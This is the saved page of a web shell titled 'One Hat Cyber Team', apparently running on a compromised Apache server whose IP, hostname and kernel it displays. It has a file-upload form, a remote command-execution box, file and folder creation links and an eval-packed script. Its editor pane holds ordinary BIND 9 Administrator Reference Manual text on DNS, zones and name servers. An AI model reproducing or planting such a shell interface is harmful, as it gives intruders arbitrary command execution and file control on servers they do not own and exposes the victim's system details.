PK<!DOCTYPE html>
<html lang="en">
  <head>
    <title>Default page</title>
    <link rel="icon" type="image/x-icon" href="//hpanel.hostinger.com/favicons/hostinger.png">
    <meta charset="utf-8">
    <meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">
    <meta content="Default page" name="description">
    <meta content="width=device-width, initial-scale=1" name="viewport">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css">
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <link href="//fonts.googleapis.com/css2?family=Bree+Serif&family=Rock+Salt&display=swap" rel="stylesheet">
    <script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
    <style>body{color:#000;font-size:0;font-family:'Bree Serif',serif;width:99%;padding:0;margin:7px auto;background-color:black!important}.bg-dark{background-color:black!important}.border{box-shadow:0 0 10px #ff1493;border:2px solid #ff1493!important;border-radius:5px;background:#fff0}.border:hover{box-shadow:0 0 10px #ff1493}.table td{padding:.1rem;box-shadow:inset 0 0 0 1px #ff1493;border-radius:2px}.table thead th{font-family:'Bree Serif',serif;box-shadow:inset 0 0 0 1.5px #ff1493;color:#ff1493;padding:.25rem;border-radius:5px;background:linear-gradient(to bottom,black,rgb(63 63 63 / .5))}.table-hover tbody tr:hover td{background:rgb(63 63 63 / .5)}.table>tbody>tr>*{color:#fff;vertical-align:middle}.form-control{background:transparent!important;color:#fff!important;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}.form-group{margin:.2rem 0}li{font-size:large!important;color:#ff1493!important;list-style:inherit!important}a{color:#fff;text-decoration:none!important}a:hover{color:#ff1493;animation:kedip 1s linear infinite}h5{margin:1.5px 0;color:#ff1493!important;padding:2px}textarea{width:97%;font-size:medium!important;font-family:inherit;height:44vh;padding-left:5px}button,input{border:2px solid #ff1493;border-radius:5px;font-size:15px;color:#fff;line-height:normal;font-family:inherit}button:hover,input:hover{cursor:pointer}.ohct{padding:0 1rem;color:#fff;border:2px solid #ff1493;border-radius:5px;background-color:#fff0;font-family:inherit;font-size:16px}.ohct:hover{color:#ff1493!important}.combet{color:#fff}.combet:hover{color:#ff1493}.p-1{padding:4px}::selection{color:#000;background:silver}.fa{padding:10px;font-size:20px;width:50px;text-align:center;margin:5px;color:#ff1493}.fa:hover{border:2px solid #ff1493}.text-light{color:#f8f9fa!important;font-size:large!important}.kedip{animation:kedip 1s linear infinite}@keyframes kedip{0%,100%{color:#ff1493}50%{color:#fff}}@keyframes rainbowBorder{0%{border-image:linear-gradient(to right,#ff1493,magenta) 1}14%{border-image:linear-gradient(to right,magenta,lime) 1}28%{border-image:linear-gradient(to right,lime,yellow) 1}42%{border-image:linear-gradient(to right,yellow,orange) 1}57%{border-image:linear-gradient(to right,orange,#ff1493) 1}71%{border-image:linear-gradient(to right,#ff1493,pink) 1}85%{border-image:linear-gradient(to right,pink,#ff1493) 1}}.rainbow-border{border:2px solid #ff1493;border-radius:5px!important;animation:rainbowBorder 2s linear infinite}@keyframes rainbowText{0%,100%{color:#ff1493}14%{color:#f0f}28%{color:lime}42%{color:#ff0}57%{color:orange}71%{color:#ff1493}85%{color:pink}}@keyframes rainbowText1{0%,100%{color:pink}14%{color:#ff1493}28%{color:orange}42%{color:#ff0}57%{color:lime}71%{color:#f0f}85%{color:#ff1493}}.rainbow-text{animation:rainbowText 2s infinite;font-weight:700}.rainbow-text1{animation:rainbowText1 2s infinite;font-weight:700}hover{box-shadow:0 0 10px #ff1493}.table td{padding:.1rem;box-shadow:inset 0 0 0 1px #ff1493;border-radius:2px}.table thead th{font-family:'Bree Serif',serif;box-shadow:inset 0 0 0 1.5px #ff1493;color:#ff1493;padding:.25rem;border-radius:5px;background:linear-gradient(to bottom,black,rgb(63 63 63 / .5))}.table-hover tbody tr:hover td{background:rgb(63 63 63 / .5)}.form-control{background:transparent!important;color:#fff!important;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}.ohct{padding:0 1rem;color:#fff;border:2px solid #ff1493;border-radius:5px;background-color:#fff0;font-size:16px}.ohct:hover{color:#ff1493!important}.rainbow-border{border:2px solid #ff1493;border-radius:5px!important;animation:rainbowBorder 2s linear infinite}@keyframes rainbowBorder{0%{border-image:linear-gradient(to right,#ff1493,magenta) 1}14%{border-image:linear-gradient(to right,magenta,lime) 1}28%{border-image:linear-gradient(to right,lime,yellow) 1}42%{border-image:linear-gradient(to right,yellow,orange) 1}57%{border-image:linear-gradient(to right,orange,#ff1493) 1}71%{border-image:linear-gradient(to right,#ff1493,pink) 1}85%{border-image:linear-gradient(to right,pink,#ff1493) 1}}</style>
  </head>
<body>
    <div class="table-responsive text-light rainbow-border" style="text-align: left; padding: 4px;">
        <div style="text-align: center; display: flex; align-items: center; justify-content: center;">
            <a href="//t.me/combetohct" target="_blank" rel="noopener noreferrer">
                <span class="material-symbols-outlined rainbow-text1" style="font-size: 3rem;padding-right: 0.5rem;">&#9885;</span>
            </a>
            <a href="?" style="font-size: 1.5rem; padding: 0.5rem;">
                <span class="rainbow-text" style="font-family: Rock Salt;">One Hat Cyber Team</span>
            </a>
            <a href="mailto:combetohct@yahoo.com">
                <span class="material-symbols-outlined rainbow-text1" style="font-size: 3rem;padding-left: 0.5rem;">&#9885;</span>
            </a>
        </div>
        <ul style="margin: 0; padding-inline-start: 30px;">
        <li>Your IP: <span style="color: white;">198.50.126.145</span></li>
        <li>Server IP: <span style="color: white;">198.50.126.145</span></li>
        <li>Server: <span style="color: white;">Linux servidor.grupodeallus.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64</span></li>
        <li>Server Software: <span style="color: white;">Apache</span></li>
        <li>PHP Version: <span style="color: white;">8.2.29</span></li>
            <li>
                <a href="?p=2f7573722f73686172652f646f632f62696e64&a=6e657746696c65" class="ohct">Buat File</a> | 
                <a href="?p=2f7573722f73686172652f646f632f62696e64&a=6e6577446972" class="ohct">Buat Folder</a>
            </li>
        </ul>
        <form action="" method="POST" enctype="multipart/form-data" style="padding: 0.10rem; display: inline-block; margin: 2px 0;">
        <input type="file" name="uploadedfilenya">
        <input type="submit" name="uploadfilenya" value="Upload" class="button ohct">
    </form>
           <form method="POST" style="margin: 2px 0;">
            <div class="form-group">
                <input type="text" name="command" class="border p-1" style="text-align: center; width: 296px; height: 29px;" placeholder="Masukkan Command">
                <button type="submit" name="execute_command" class="ohct">Eksekusi</button>
            </div>
        </form>
            </div>
<div class="table-responsive text-light rainbow-border" style="text-align: left;padding: 4px;margin-bottom: 3px;margin-top: 3px;">
<li>Dir : <span><a href="?p=2f" class="combet">~</a>/<a class="combet" href="?p=2f757372">usr</a>/<a class="combet" href="?p=2f7573722f7368617265">share</a>/<a class="combet" href="?p=2f7573722f73686172652f646f63">doc</a>/<a class="combet" href="?p=2f7573722f73686172652f646f632f62696e64">bind</a>/ 
</span></li></div>
<div class="table-responsive text-light" style="text-align: center;font-family: inherit;font-size: large;">
<h5 class="p-1 rainbow-border">Edit File: Bv9ARM.ch01.html</h5>
    <form method="POST">
        <textarea name="edited_content" cols="30" rows="10" class="form-control rainbow-border"><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
 - Copyright (C) 2000-2021 Internet Systems Consortium, Inc. ("ISC")
 - 
 - This Source Code Form is subject to the terms of the Mozilla Public
 - License, v. 2.0. If a copy of the MPL was not distributed with this
 - file, You can obtain one at http://mozilla.org/MPL/2.0/.
-->
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Chapter 1. Introduction</title>
<meta name="generator" content="DocBook XSL Stylesheets V1.79.1">
<link rel="home" href="Bv9ARM.html" title="BIND 9 Administrator Reference Manual">
<link rel="up" href="Bv9ARM.html" title="BIND 9 Administrator Reference Manual">
<link rel="prev" href="Bv9ARM.html" title="BIND 9 Administrator Reference Manual">
<link rel="next" href="Bv9ARM.ch02.html" title="Chapter 2. BIND Resource Requirements">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<div class="navheader">
<table width="100%" summary="Navigation header">
<tr><th colspan="3" align="center">Chapter 1. Introduction</th></tr>
<tr>
<td width="20%" align="left">
<a accesskey="p" href="Bv9ARM.html">Prev</a> </td>
<th width="60%" align="center"> </th>
<td width="20%" align="right"> <a accesskey="n" href="Bv9ARM.ch02.html">Next</a>
</td>
</tr>
</table>
<hr>
</div>
<div class="chapter">
<div class="titlepage"><div><div><h1 class="title">
<a name="Bv9ARM.ch01"></a>Chapter 1. Introduction</h1></div></div></div>
<div class="toc">
<p><b>Table of Contents</b></p>
<dl class="toc">
<dt><span class="section"><a href="Bv9ARM.ch01.html#doc_scope">Scope of Document</a></span></dt>
<dt><span class="section"><a href="Bv9ARM.ch01.html#organization">Organization of This Document</a></span></dt>
<dt><span class="section"><a href="Bv9ARM.ch01.html#conventions">Conventions Used in This Document</a></span></dt>
<dt><span class="section"><a href="Bv9ARM.ch01.html#dns_overview">The Domain Name System (<acronym class="acronym">DNS</acronym>)</a></span></dt>
<dd><dl>
<dt><span class="section"><a href="Bv9ARM.ch01.html#dns_fundamentals">DNS Fundamentals</a></span></dt>
<dt><span class="section"><a href="Bv9ARM.ch01.html#domain_names">Domains and Domain Names</a></span></dt>
<dt><span class="section"><a href="Bv9ARM.ch01.html#zones">Zones</a></span></dt>
<dt><span class="section"><a href="Bv9ARM.ch01.html#auth_servers">Authoritative Name Servers</a></span></dt>
<dt><span class="section"><a href="Bv9ARM.ch01.html#cache_servers">Caching Name Servers</a></span></dt>
<dt><span class="section"><a href="Bv9ARM.ch01.html#multi_role">Name Servers in Multiple Roles</a></span></dt>
</dl></dd>
</dl>
</div>
<p>
      The Internet Domain Name System (<acronym class="acronym">DNS</acronym>)
      consists of the syntax
      to specify the names of entities in the Internet in a hierarchical
      manner, the rules used for delegating authority over names, and the
      system implementation that actually maps names to Internet
      addresses.  <acronym class="acronym">DNS</acronym> data is maintained in a
      group of distributed
      hierarchical databases.
    </p>
<div class="section">
<div class="titlepage"><div><div><h2 class="title" style="clear: both">
<a name="doc_scope"></a>Scope of Document</h2></div></div></div>
<p>
        The Berkeley Internet Name Domain
        (<acronym class="acronym">BIND</acronym>) implements a
        domain name server for a number of operating systems. This
        document provides basic information about the installation and
        care of the Internet Systems Consortium (<acronym class="acronym">ISC</acronym>)
        <acronym class="acronym">BIND</acronym> version 9 software package for
        system administrators.
      </p>
<p>This version of the manual corresponds to BIND version 9.11.</p>
</div>
<div class="section">
<div class="titlepage"><div><div><h2 class="title" style="clear: both">
<a name="organization"></a>Organization of This Document</h2></div></div></div>
<p>
        In this document, <span class="emphasis"><em>Chapter 1</em></span> introduces
        the basic <acronym class="acronym">DNS</acronym> and <acronym class="acronym">BIND</acronym> concepts. <span class="emphasis"><em>Chapter 2</em></span>
        describes resource requirements for running <acronym class="acronym">BIND</acronym> in various
        environments. Information in <span class="emphasis"><em>Chapter 3</em></span> is
        <span class="emphasis"><em>task-oriented</em></span> in its presentation and is
        organized functionally, to aid in the process of installing the
        <acronym class="acronym">BIND</acronym> 9 software. The task-oriented
        section is followed by
        <span class="emphasis"><em>Chapter 4</em></span>, which contains more advanced
        concepts that the system administrator may need for implementing
        certain options. <span class="emphasis"><em>Chapter 5</em></span>
        describes the <acronym class="acronym">BIND</acronym> 9 lightweight
        resolver.  The contents of <span class="emphasis"><em>Chapter 6</em></span> are
        organized as in a reference manual to aid in the ongoing
        maintenance of the software. <span class="emphasis"><em>Chapter 7</em></span> addresses
        security considerations, and
        <span class="emphasis"><em>Chapter 8</em></span> contains troubleshooting help. The
        main body of the document is followed by several
        <span class="emphasis"><em>appendices</em></span> which contain useful reference
        information, such as a <span class="emphasis"><em>bibliography</em></span> and
        historic information related to <acronym class="acronym">BIND</acronym>
        and the Domain Name
        System.
      </p>
</div>
<div class="section">
<div class="titlepage"><div><div><h2 class="title" style="clear: both">
<a name="conventions"></a>Conventions Used in This Document</h2></div></div></div>
<p>
        In this document, we use the following general typographic
        conventions:
      </p>
<div class="informaltable"><table class="informaltable" border="1">
<colgroup>
<col width="3.000in" class="1">
<col width="2.625in" class="2">
</colgroup>
<tbody>
<tr>
<td>
                <p>
                  <span class="emphasis"><em>To describe:</em></span>
                </p>
              </td>
<td>
                <p>
                  <span class="emphasis"><em>We use the style:</em></span>
                </p>
              </td>
</tr>
<tr>
<td>
                <p>
                  a pathname, filename, URL, hostname,
                  mailing list name, or new term or concept
                </p>
              </td>
<td>
                <p>
                  <code class="filename">Fixed width</code>
                </p>
              </td>
</tr>
<tr>
<td>
                <p>
                  literal user
                  input
                </p>
              </td>
<td>
                <p>
                  <strong class="userinput"><code>Fixed Width Bold</code></strong>
                </p>
              </td>
</tr>
<tr>
<td>
                <p>
                  program output
                </p>
              </td>
<td>
                <p>
                  <code class="computeroutput">Fixed Width</code>
                </p>
              </td>
</tr>
</tbody>
</table></div>
<p>
        The following conventions are used in descriptions of the
        <acronym class="acronym">BIND</acronym> configuration file:</p>
<div class="informaltable"><table class="informaltable" border="1">
<colgroup>
<col width="3.000in" class="1">
<col width="2.625in" class="2">
</colgroup>
<tbody>
<tr>
<td>
                  <p>
                    <span class="emphasis"><em>To describe:</em></span>
                  </p>
                </td>
<td>
                  <p>
                    <span class="emphasis"><em>We use the style:</em></span>
                  </p>
                </td>
</tr>
<tr>
<td>
                  <p>
                    keywords
                  </p>
                </td>
<td>
                  <p>
                    <code class="literal">Fixed Width</code>
                  </p>
                </td>
</tr>
<tr>
<td>
                  <p>
                    variables
                  </p>
                </td>
<td>
                  <p>
                    <code class="varname">Fixed Width</code>
                  </p>
                </td>
</tr>
<tr>
<td>
                  <p>
                    Optional input
                  </p>
                </td>
<td>
                  <p>
                    [<span class="optional">Text is enclosed in square brackets</span>]
                  </p>
                </td>
</tr>
</tbody>
</table></div>
<p>
      </p>
</div>
<div class="section">
<div class="titlepage"><div><div><h2 class="title" style="clear: both">
<a name="dns_overview"></a>The Domain Name System (<acronym class="acronym">DNS</acronym>)</h2></div></div></div>
<p>
        This document explains the installation
        and upkeep of the <acronym class="acronym">BIND</acronym> (Berkeley Internet
        Name Domain) software package. We
        begin by reviewing the fundamentals of the Domain Name System
        (<acronym class="acronym">DNS</acronym>) as they relate to <acronym class="acronym">BIND</acronym>.
      </p>
<div class="section">
<div class="titlepage"><div><div><h3 class="title">
<a name="dns_fundamentals"></a>DNS Fundamentals</h3></div></div></div>
<p>
          The Domain Name System (DNS) is a hierarchical, distributed
          database.  It stores information for mapping Internet host names to
          IP
          addresses and vice versa, mail routing information, and other data
          used by Internet applications.
        </p>
<p>
          Clients look up information in the DNS by calling a
          <span class="emphasis"><em>resolver</em></span> library, which sends queries to one or
          more <span class="emphasis"><em>name servers</em></span> and interprets the responses.
          The <acronym class="acronym">BIND</acronym> 9 software distribution
          contains a name server, <span class="command"><strong>named</strong></span>, and a
          resolver library, <span class="command"><strong>liblwres</strong></span>.
        </p>
</div>
<div class="section">
<div class="titlepage"><div><div><h3 class="title">
<a name="domain_names"></a>Domains and Domain Names</h3></div></div></div>
<p>
          The data stored in the DNS is identified by <span class="emphasis"><em>domain names</em></span> that are organized as a tree according to
          organizational or administrative boundaries. Each node of the tree,
          called a <span class="emphasis"><em>domain</em></span>, is given a label. The domain
          name of the
          node is the concatenation of all the labels on the path from the
          node to the <span class="emphasis"><em>root</em></span> node.  This is represented
          in written form as a string of labels listed from right to left and
          separated by dots. A label need only be unique within its parent
          domain.
        </p>
<p>
          For example, a domain name for a host at the
          company <span class="emphasis"><em>Example, Inc.</em></span> could be
          <code class="literal">ourhost.example.com</code>,
          where <code class="literal">com</code> is the
          top level domain to which
          <code class="literal">ourhost.example.com</code> belongs,
          <code class="literal">example</code> is
          a subdomain of <code class="literal">com</code>, and
          <code class="literal">ourhost</code> is the
          name of the host.
        </p>
<p>
          For administrative purposes, the name space is partitioned into
          areas called <span class="emphasis"><em>zones</em></span>, each starting at a node and
          extending down to the "leaf" nodes or to nodes where other zones
          start.
          The data for each zone is stored in a <span class="emphasis"><em>name server</em></span>, which answers queries about the zone using the
          <span class="emphasis"><em>DNS protocol</em></span>.
        </p>
<p>
          The data associated with each domain name is stored in the
          form of <span class="emphasis"><em>resource records</em></span> (<acronym class="acronym">RR</acronym>s).
          Some of the supported resource record types are described in
          <a class="xref" href="Bv9ARM.ch06.html#types_of_resource_records_and_when_to_use_them" title="Types of Resource Records and When to Use Them">the section called &#8220;Types of Resource Records and When to Use Them&#8221;</a>.
        </p>
<p>
          For more detailed information about the design of the DNS and
          the DNS protocol, please refer to the standards documents listed in
          <a class="xref" href="Bv9ARM.ch11.html#rfcs" title="Requests for Comments (RFCs)">the section called &#8220;Requests for Comments (RFCs)&#8221;</a>.
        </p>
</div>
<div class="section">
<div class="titlepage"><div><div><h3 class="title">
<a name="zones"></a>Zones</h3></div></div></div>
<p>
          To properly operate a name server, it is important to understand
          the difference between a <span class="emphasis"><em>zone</em></span>
          and a <span class="emphasis"><em>domain</em></span>.
        </p>
<p>
          As stated previously, a zone is a point of delegation in
          the <acronym class="acronym">DNS</acronym> tree. A zone consists of
          those contiguous parts of the domain
          tree for which a name server has complete information and over which
          it has authority. It contains all domain names from a certain point
          downward in the domain tree except those which are delegated to
          other zones. A delegation point is marked by one or more
          <span class="emphasis"><em>NS records</em></span> in the
          parent zone, which should be matched by equivalent NS records at
          the root of the delegated zone.
        </p>
<p>
          For instance, consider the <code class="literal">example.com</code>
          domain which includes names
          such as <code class="literal">host.aaa.example.com</code> and
          <code class="literal">host.bbb.example.com</code> even though
          the <code class="literal">example.com</code> zone includes
          only delegations for the <code class="literal">aaa.example.com</code> and
          <code class="literal">bbb.example.com</code> zones.  A zone can
          map
          exactly to a single domain, but could also include only part of a
          domain, the rest of which could be delegated to other
          name servers. Every name in the <acronym class="acronym">DNS</acronym>
          tree is a
          <span class="emphasis"><em>domain</em></span>, even if it is
          <span class="emphasis"><em>terminal</em></span>, that is, has no
          <span class="emphasis"><em>subdomains</em></span>.  Every subdomain is a domain and
          every domain except the root is also a subdomain. The terminology is
          not intuitive and we suggest reading RFCs 1033, 1034, and 1035
          to
          gain a complete understanding of this difficult and subtle
          topic.
        </p>
<p>
          Though <acronym class="acronym">BIND</acronym> is called a "domain name
          server",
          it deals primarily in terms of zones. The "primary" and "secondary"
          declarations in the <code class="filename">named.conf</code> file
          specify
          zones, not domains. When BIND asks some other site if it is willing to
          be a secondary server for a <span class="emphasis"><em>domain</em></span>, it is
          actually asking for secondary service for some collection of <span class="emphasis"><em>zones</em></span>.
        </p>
</div>
<div class="section">
<div class="titlepage"><div><div><h3 class="title">
<a name="auth_servers"></a>Authoritative Name Servers</h3></div></div></div>
<p>
          Each zone is served by at least
          one <span class="emphasis"><em>authoritative name server</em></span>,
          which contains the complete data for the zone.
          To make the DNS tolerant of server and network failures,
          most zones have two or more authoritative servers, on
          different networks.
        </p>
<p>
          Responses from authoritative servers have the "authoritative
          answer" (AA) bit set in the response packets.  This makes them
          easy to identify when debugging DNS configurations using tools like
          <span class="command"><strong>dig</strong></span> (<a class="xref" href="Bv9ARM.ch03.html#diagnostic_tools" title="Diagnostic Tools">the section called &#8220;Diagnostic Tools&#8221;</a>).
        </p>
<div class="section">
<div class="titlepage"><div><div><h4 class="title">
<a name="primary_master"></a>The Primary Server</h4></div></div></div>
<p>
            The authoritative server where the main copy of the zone
            data is maintained is called the
            <span class="emphasis"><em>primary</em></span> (or
            <span class="command"><strong>master</strong></span>) server, or simply the
            <span class="emphasis"><em>primary</em></span>.  Typically it loads the zone
            contents from some local file edited by humans or perhaps
            generated mechanically from some other local file which is
            edited by humans.  This file is called the
            <span class="emphasis"><em>zone file</em></span> or
            <span class="emphasis"><em>master file</em></span>.
          </p>
<p>
            In some cases, however, the zone file may not be edited
            by humans at all, but may instead be the result of
            <span class="emphasis"><em>dynamic update</em></span> operations.
          </p>
</div>
<div class="section">
<div class="titlepage"><div><div><h4 class="title">
<a name="slave_server"></a>Secondary Servers</h4></div></div></div>
<p>
            The other authoritative servers, called the
            <span class="emphasis"><em>secondary</em></span>
            (or <span class="command"><strong>slave</strong></span>) servers, load the zone
            contents from another server using a replication
            process known as a <span class="emphasis"><em>zone transfer</em></span>.
            Typically the data is transferred directly from the primary
            master, but it is also possible to transfer it from another
            secondary.  In other words, a secondary server may itself act as a
            primary to a subordinate secondary server.
          </p>
<p>
            Periodically, the secondary server must send a refresh query to
            determine whether the zone contents have been updated. This
            is done by sending a query for the zone's Start of Authority (SOA) record and
            checking whether the SERIAL field has been updated; if so,
            a new transfer request is initiated. The timing of these
            refresh queries is controlled by the SOA REFRESH and RETRY
            fields, but can be overridden with the
            <span class="command"><strong>max-refresh-time</strong></span>,
            <span class="command"><strong>min-refresh-time</strong></span>,
            <span class="command"><strong>max-retry-time</strong></span>, and
            <span class="command"><strong>min-retry-time</strong></span> options.
          </p>
<p>
            If the zone data cannot be updated within the time specified
            by the SOA EXPIRE option (up to a hard-coded maximum of
            24 weeks), the secondary zone expires and no longer
            responds to queries.
          </p>
</div>
<div class="section">
<div class="titlepage"><div><div><h4 class="title">
<a name="stealth_server"></a>Stealth Servers</h4></div></div></div>
<p>
            Usually, all of the zone's authoritative servers are listed in
            NS records in the parent zone.  These NS records constitute
            a <span class="emphasis"><em>delegation</em></span> of the zone from the parent.
            The authoritative servers are also listed in the zone file itself,
            at the <span class="emphasis"><em>top level</em></span> or <span class="emphasis"><em>apex</em></span>
            of the zone.  Servers that are not in the parent's NS delegation can be listed in the zone's top-level NS
            records, but servers that are not present at
            the zone's top level cannot be listed in the parent's delegation.
          </p>
<p>
            A <span class="emphasis"><em>stealth server</em></span> is a server that is
            authoritative for a zone but is not listed in that zone's NS
            records.  Stealth servers can be used for keeping a local copy of
            a
            zone, to speed up access to the zone's records, or to make sure that
            the
            zone is available even if all the "official" servers for the zone
            are
            inaccessible.
          </p>
<p>
            A configuration where the primary server itself is a
            stealth server is often referred to as a "hidden primary"
            configuration.  One use for this configuration is when the primary
            is behind a firewall and is therefore unable to communicate directly
            with the outside world.
          </p>
</div>
</div>
<div class="section">
<div class="titlepage"><div><div><h3 class="title">
<a name="cache_servers"></a>Caching Name Servers</h3></div></div></div>
<p>
          The resolver libraries provided by most operating systems are
          <span class="emphasis"><em>stub resolvers</em></span>, meaning that they are not
          capable of
          performing the full DNS resolution process by themselves by talking
          directly to the authoritative servers.  Instead, they rely on a
          local
          name server to perform the resolution on their behalf.  Such a
          server
          is called a <span class="emphasis"><em>recursive</em></span> name server; it performs
          <span class="emphasis"><em>recursive lookups</em></span> for local clients.
        </p>
<p>
          To improve performance, recursive servers cache the results of
          the lookups they perform.  Since the processes of recursion and
          caching are intimately connected, the terms
          <span class="emphasis"><em>recursive server</em></span> and
          <span class="emphasis"><em>caching server</em></span> are often used synonymously.
        </p>
<p>
          The length of time for which a record may be retained in
          the cache of a caching name server is controlled by the
          Time-To-Live (TTL) field associated with each resource record.
        </p>
<div class="section">
<div class="titlepage"><div><div><h4 class="title">
<a name="forwarder"></a>Forwarding</h4></div></div></div>
<p>
            Even a caching name server does not necessarily perform
            the complete recursive lookup itself.  Instead, it can
            <span class="emphasis"><em>forward</em></span> some or all of the queries
            that it cannot satisfy from its cache to another caching name
            server,
            commonly referred to as a <span class="emphasis"><em>forwarder</em></span>.
          </p>
<p>
            Forwarders are typically used when an administrator does not
            wish for all the servers at a given site to interact
            directly with the rest of the Internet. For example, a
            common scenario is when multiple internal DNS servers are
            behind an Internet firewall. Servers behind the firewall
            forward their requests to the server with external access,
            which queries Internet DNS servers on the internal servers'
            behalf.
          </p>
<p>
            Another scenario (largely now superseded by Response Policy
            Zones) is to send queries first to a custom server for RBL
            processing before forwarding them to the wider Internet.
          </p>
<p>
            There may be one or more forwarders in a given setup. The
            order in which the forwarders are listed in
            <code class="filename">named.conf</code> does not determine the
            sequence in which they are queried; rather,
            <span class="command"><strong>named</strong></span> uses the response times from
            previous queries to select the server that is likely to
            respond the most quickly. A server that has not yet been
            queried is given an initial small random response time to
            ensure that it is tried at least once. Dynamic adjustment of
            the recorded response times ensures that all forwarders are
            queried, even those with slower response times.  This
            permits changes in behavior based on server responsiveness.
          </p>
</div>
</div>
<div class="section">
<div class="titlepage"><div><div><h3 class="title">
<a name="multi_role"></a>Name Servers in Multiple Roles</h3></div></div></div>
<p>
          The <acronym class="acronym">BIND</acronym> name server can
          simultaneously act as
          a primary for some zones, a secondary for other zones, and a caching
          (recursive) server for a set of local clients.
        </p>
<p>
          However, since the functions of authoritative name service
          and caching/recursive name service are logically separate, it is
          often advantageous to run them on separate server machines.

          A server that only provides authoritative name service
          (an <span class="emphasis"><em>authoritative-only</em></span> server) can run with
          recursion disabled, improving reliability and security.

          A server that is not authoritative for any zones and only provides
          recursive service to local
          clients (a <span class="emphasis"><em>caching-only</em></span> server)
          does not need to be reachable from the Internet at large and can
          be placed inside a firewall.
        </p>
</div>
</div>
</div>
<div class="navfooter">
<hr>
<table width="100%" summary="Navigation footer">
<tr>
<td width="40%" align="left">
<a accesskey="p" href="Bv9ARM.html">Prev</a> </td>
<td width="20%" align="center"> </td>
<td width="40%" align="right"> <a accesskey="n" href="Bv9ARM.ch02.html">Next</a>
</td>
</tr>
<tr>
<td width="40%" align="left" valign="top">BIND 9 Administrator Reference Manual </td>
<td width="20%" align="center"><a accesskey="h" href="Bv9ARM.html">Home</a></td>
<td width="40%" align="right" valign="top"> Chapter 2. <acronym class="acronym">BIND</acronym> Resource Requirements</td>
</tr>
</table>
</div>
<p xmlns:db="http://docbook.org/ns/docbook" style="text-align: center;">BIND 9.11.36 (Extended Support Version)</p>
</body>
</html>
</textarea>
        <button type="submit" name="save_edit" class="ohct" style="margin-top: .2rem;">Simpan</button>
    </form>
</div>
 
</div>
<script src="//code.jquery.com/jquery-3.5.1.slim.min.js"></script>
<script src="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js" ></script>
<script src="//cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"></script>
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('E.n();$(\'[2-m="4"]\').4();$(".l").k(j(e){e.g();h 0=$(6).5("2-0");c({b:"a",9:"o i q?",w:"D "+0+" p C B",A:7,z:7,}).y((8)=>{r(8){x 1=$(6).5("3")+"&t="+((0=="v")?"d":"f");u.s.3=1}})});',41,41,'type|buildURL|data|href|tooltip|attr|this|true|willDelete|title|warning|icon|swal||||preventDefault|let|you|function|click|delete|toggle|init|Are|will|sure|if|location||document|folder|text|const|then|dangerMode|buttons|deleted|be|This|bsCustomFileInput'.split('|'),0,{}))</script>
</body>
</html>